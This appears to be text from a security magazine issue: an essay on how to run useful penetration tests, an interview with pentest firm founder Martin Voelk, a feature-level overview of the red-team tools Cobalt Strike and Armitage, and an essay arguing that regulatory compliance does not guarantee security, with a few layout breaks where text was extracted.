I think it's really important to convey a few key points about penetration tests: 1. A pentest does not
make your company un-hackable. The main objective of a well-done pentest is to reduce your attack
surface. Your goal as a company should be to allow the specialized team conducting the pentest,
to treat your network as though they were a real attacker trying to get in. You want to find as many
holes in your network as you can and close them. 2. Put as few restrictions on the pentesters
as possible. A recent trend I have noticed in the past year has been companies that are contractually
obligated to have these tests done but see them as a burden and dramatically limit the network
exposure that the teams are allowed to have. This makes the results of your pentest borderline useless.
One example I have seen of this is when I was told I can give them a report of my web application scans but
under no circumstances am I to exploit any vulnerability found. Exploitation not only helps to find the
directions of traversal after gaining access but also tests any scanners, firewalls and loggers that are
in place to see if they are configured to pick up on these kinds of events, so it is very important to allow
the pentesters to run a full pentest against your defenses. And finally number 3. After all is said and
done, your pentest is complete and your attack surface reduced and you have your certificate in hand,
spend the next 364 days maintaining the hard work you just put in. Patch your systems, check your
logs, and always verify your code.
So what does all this mean for the future of pentesting? I believe that we will continue to see a massive
increase in the requirement to have not only annual but semiannual pentests conducted for high profile
companies especially. I strongly feel that C-Level personnel in these enterprises are starting to see not
just the compliance value but also the security value to having proper pentests conducted. Executives
are able to see firsthand more and more in the news just how important it is to maintain a secure
environment for your company's data. Of course, with the increase in demand for pentesting, there
in turn is an increase in those offering pentest services. Make sure you do your homework on who you
sign to conduct your pentest. That person, whom you give access to your network, can do a lot
of damage if they are guessing their way through! If you see your pentester sitting in your office
watching a YouTube video on how to use msfconsole, you need to dismiss them as soon as you can.
There are plenty of reputable companies out there; you just need to find one that meets your
company's needs as well as fits your company's financial situation.
MARTIN VOELK
Martin is an IT Security veteran with 18 years of experience
in the IT industry. Prior to setting up CYBER 51 in 2009, Martin
was already regularly teaching Penetration Testing Training
Courses, Cisco authorized Security Courses and was regularly
engaged by governments and other businesses to establish
Security policies, perform Ethical Hacking and Penetration Tests
in order to secure network infrastructures and to remediate the
threats encountered.
[PM]: Your firm provides services for companies from different sectors like the card industry,
healthcare, manufacturing or education. Do you find more sectors becoming aware of cyber
attacks?
[MV]: Security awareness has certainly reached board level. Many clients we have still don't believe they
could be targeted, but use our services regardless because they are bound to government and industry
regulations such as PCI, HIPAA, ISO 27001 etc.
[PM]: What is the major difficulty in working with such different companies and sectors?
[MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with the customer.
On some occasions, especially in larger companies, internal engineers become very defensive when
being confronted with results. However, it's not our aim to finger-point. We merely uncover holes and
help customers become more secure. On other occasions, the more we find, the more it is
appreciated. Another big challenge is governmental work as it often requires very specific skills and
certifications but the consultant holds a wrong passport. This can be very frustrating at times as, for
example, only a UK citizen is allowed to perform the work for a UK government client.
[PM]: From your own experience, do you prefer to work with smaller or bigger companies?
[MV]: We prefer mid size to large size.
[PM]: I can see your company provides great initiative: free educational sessions for children.
Can you tell us more about this idea?
[MV]: Those are little awareness workshops for children at schools. We started that program in Mexico
where one of our offices is. We teach children how to stay safe when using laptops, smartphones, pads,
social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable
for kids.
[PM]: What are your general thoughts about development of cyber security market?
[MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social
Engineering), Web Applications, Mobile Apps and Wireless.
[PM]: As a person who knows penetration testing tools a lot, do you think there are going to be
any breakthrough changes in technology?
[MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications
will become more sophisticated and need more testing and the mobile market brings its own new
challenges in Wireless and Apps.
[PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security
specialists? Do you find it's going to be harder to find a job in this area?
[MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile,
Colombia and Panama). We also engage in the UK market but very little in other countries. For us the
biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and
employers in the US actually often struggle to find the right skills available.
The top 3 criteria:
- OSCP certified or better (OSCE etc.). The Offensive Security Certifications are the best ones in the
market and we hire OSCPs over CEH, because the OSCP is a hands-on and very challenging exam.
Someone who passed that exam is a real pentester who also can do reporting.
- Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the
guys outside the US don't come with great English language skills.
- Integrity, working to timelines and reliability.
[PM]: Everyday we can hear about new attacks. How do you see cyber threats evolving in the
near future?
[MV]: It will remain a never ending cat and mouse game. The trends are shifting more to organized crime
and away from individual guys. Some of the attacks we have seen at customers require teams of highly
skilled experts and tools and a lot of the underworld has created and is creating task forces for certain
jobs. A lot more challenging to tackle than the lone hacker or script kiddie.
[PM]: Have you got any final thoughts about trends in penetration testing and vulnerability
analysis in 2016?
[MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin
American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting.
Also a lot of companies start realizing that technical defense isn't everything and that social engineering
makes up a lot of the breaches. User education and enforcement of policies will become a much bigger
part.
[PM]: Do you have any thoughts or experiences you would like to share with our audience? Any
good advice?
[MV]: Think of security as a wheel and a never ending circle. A traditional pentest (Network and Web
App) is not good enough anymore these days. Pentesting should include mobile App, Wireless,
Bluetooth and Social Engineering.
For aspiring pentesters and existing pentesters, do the Offensive Security Certified Professional (OSCP)
certification. It's very well recognized in the industry and weeds out the theory from the hands-on folks.
I started to write this article about one of my favorite security tools, Cobalt Strike, but
as I delved into the history and thinking behind Cobalt Strike I realized that a better story lies
beneath the surface. The real story is about Pentesting and Adversarial Role Playing, which
is thought to be the next stage of Digital Security. There's a whole new breed of White Hat Hackers, and
they are called Threat Actors.
a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling
peer-to-peer Beacons over Windows named pipes (Cobalt Strike website). Another aspect of Cobalt
Strike is its social engineering features, which allow the Actor to get a foothold, and it adds covert command and
control with Beacon, browser pivoting, and reporting to Armitage's existing exploitation and team
collaboration capabilities. Using Beacon you can tunnel Meterpreter commands and utilize all of the
Metasploit exploit and post-exploit capabilities. Beacon facilitates the running of PowerShell scripts
over its connection, or Python or Java for example. There is even an email phishing module that reports
when your recipients open the Phishing email you sent them.
COBALT STRIKE 3.0
As of October 2015, Cobalt Strike 3.0 does not share code with Armitage or depend on the Metasploit
Framework. It's the first version of Cobalt Strike to not depend on the Metasploit Framework. The tool
is geared towards red team operations and adversary simulation services. Although it does not depend
on the Metasploit Framework you can still run Metasploit elements.
Through one Metasploit instance, your team will:
- Use the same sessions
- Share hosts, captured data, and downloaded files
- Communicate through a shared event log
- Run bots to automate red team tasks
Since October 2015, Cobalt Strike 3.0 has been available via the website. You can download a trial
version at https://www.cobaltstrike.com/trial. You can also download its sibling (Armitage) free
of charge at http://www.fastandeasyhacking.com/download
RED TEAMS
According to Wikipedia, "A red team is an independent group that challenges an organization
to improve its effectiveness. The United States intelligence community (military and civilian) has red
teams that explore alternative futures and write articles as if they were foreign world leaders. Little
formal doctrine or publications about Red Teaming in the military exist." [1]
[1] LtCol Brendan S. Mulvaney, "Strengthened Through the Challenge" (PDF), Marine Corps Gazette, July 2012.
- War Games
Why some organizations remediate successfully and efficiently, and why others struggle
THE TOOLS
The tool needs for Adversary Simulations are far different. A unique covert channel matters far more
than an unpatched exploit. A common element of Adversary Simulations is a white box assumed
breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain
compromise. The goal of the operator is to use this access to achieve effects and steal data in ways
that help exercise and prepare the security operations staff for what they're really up against.
Remember too, that the threat actor in a production environment may also be an employee of the
company, acting inside the corporate network.
ADVERSARY SIMULATION TRAINING
The tools for Adversary Simulation are coming. The tools alone are not the full package however.
Adversary Simulations require more than good tools, they require good technicians.
TRADECRAFT
Raphael Mudge uses the term Tradecraft to describe the mindset for Adversary Simulations. He says
that they require an appreciation for the efficacy that simply isn't there in the penetration testing
community yet. Tradecraft is the set of best practices of a modern Adversary. What is the adversary's
playbook? What checklists do they follow? Why do they do the things they do? These are questions
that need to be asked by a corporation's security defenders.
THE BEST DEFENSE IS A GOOD OFFENCE
Both Armitage and Cobalt Strike pack enough offensive capability to abruptly take down
a network as well as the ability to act as a long-term data exfiltrator. Penetration Testers will
get the most benefit from the current version of Armitage due to its use of the Metasploit Framework
and ready-made exploits. Threat Actors will get the most benefit from Cobalt Strike 3.0 due to its
Beacons and Social Engineering tool set. Whichever tool you use, wield it like a sword so the
network defenders can develop their defensive skills.
source: http://www.mediacontour.com
"Target was certified as meeting the standard for the payment card industry in September 2013.
Nonetheless, we suffered a data breach." Target Chairman, President, and Chief Executive Officer
Gregg Steinhafel
In Information Security, there are a plethora of Laws and Regulations: Sarbanes-Oxley Act (SOX);
Payment Card Industry Data Security Standard (PCI DSS); Gramm-Leach-Bliley Act (GLB); Electronic
Fund Transfer Act, Regulation E (EFTA); Customs-Trade Partnership Against Terrorism (C-TPAT); Free and
Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate
Credit Transaction Act (FACTA), including Red Flags Rule; Federal Rules of Civil Procedure (FRCP).
Some of the industry-specific Guidelines and Requirements include: Federal Information Security
Management Act (FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the
Code of Federal Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and
Accountability Act (HIPAA); The Health Information Technology for Economic and Clinical Health Act
(HITECH); Patient Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: The
Chemical Facility Anti-Terrorism Standards Regulation. How many of these Regulations, Laws and
Guidelines a business needs to adhere to would depend on what part of the world the business
operates from (or is domiciled in).
Laws, Regulations, Standards and Guidelines are very familiar words when it comes to Information
Security. One other word that ties all the previous words together is Compliance. Compliance, generally
speaking, is the basis for audits. Compliance is also the native language the Executive Management
of any enterprise understands. The great debate for us however is: does compliance really translate
to good security?
What is Good Information Security? According to Malcolm Carrie, head of global strategy and
architecture at BAE Systems, good information security covers people, process and technology.
It creates the understanding, at all levels in the organization, that finding the appropriate balance
of availability, integrity and confidentiality requires a full appreciation of the risks.
The rush for Compliance has more or less taken center stage in recent times, and a lot of businesses
(and the people driving those businesses) forget or are unaware of the fact that Information Security
needs should primarily be the driving force for Compliance criteria/metrics; people would not just erect
the compliance barrier for its own sake. In order to achieve good security, appropriate processes,
practices and technologies need to be implemented. In 2014, the FBI sent a warning to the healthcare
industry that its data was not secure. The biggest vulnerability was the perception among IT healthcare
professionals that their current perimeter defenses and compliance strategies were working,
when clearly the data stated otherwise.
Lots of organizations focus on compliance and have several reams of paper to show for it: policies,
procedures, and training records. Several of these organizations purchase compliance-in-a-box kits,
and because the focus is on compliance and not really security, much of the content of the
compliance-in-a-box kit still has the original blank spots where the name of the organization in question should have
been inserted. A lot of the organizations that eventually complete their documentation might never
incorporate the documentation into the corresponding process. Additionally, because assessment for
compliance might be primarily based on responding to hundreds of questions in compliance
assessment tools, or discussing with consultants, many businesses will maintain that the security
described in their policies and procedures is really in place. They might even believe it themselves!
The importance of compliance cannot be overemphasized but true Information Security goes way
beyond ticking boxes and answering a few generic questions that the consultant may have prepared.
The goal of compliance programs is to satisfy externally imposed requirements, and the requirements
in point may or may not support an effective security program. The fact that a company has been
certified compliant does not guarantee that it is secure, and some obligations that it fulfills may not
contribute anything to security. For every business that can afford it, building an in-house IT security
team might be the best way to go, and for businesses that are unable to afford it, having
a knowledgeable consultant(s) review their business process and advise, as well as help implement
appropriate security solutions, would be the way to go.
Irrespective of the sector a business operates in, the management needs to know that hackers will
always look for loopholes, and unless a business implements a comprehensive security program, and
remains eternally vigilant, hackers will always find the loopholes they want, either by exploiting the OS,
the infrastructure, the firmware, the process or the people. Risk analysis is also a very critical success
factor in information security. Businesses should determine how much risk they are exposed to and
plan accordingly after appropriately classifying the risk. Risk analysis should be done as regularly
as practicable to ensure that no part of the business process is being excluded.
Ensuring that the IT security team is knowledgeable and dedicated is also a major requirement that
needs to be addressed. One can never know how truly secure a system is until it has been tested. The
IT security team (complementary to the testing by external consultants) needs to routinely conduct
penetration testing exercises to evaluate every facet of the business process, not with the intention
of achieving regulatory compliance but with the objective of determining the security posture of the
business in order to apply any needed corrective measures before vulnerabilities are exploited by
hackers.
About the author:
AYO TAYO BALOGUN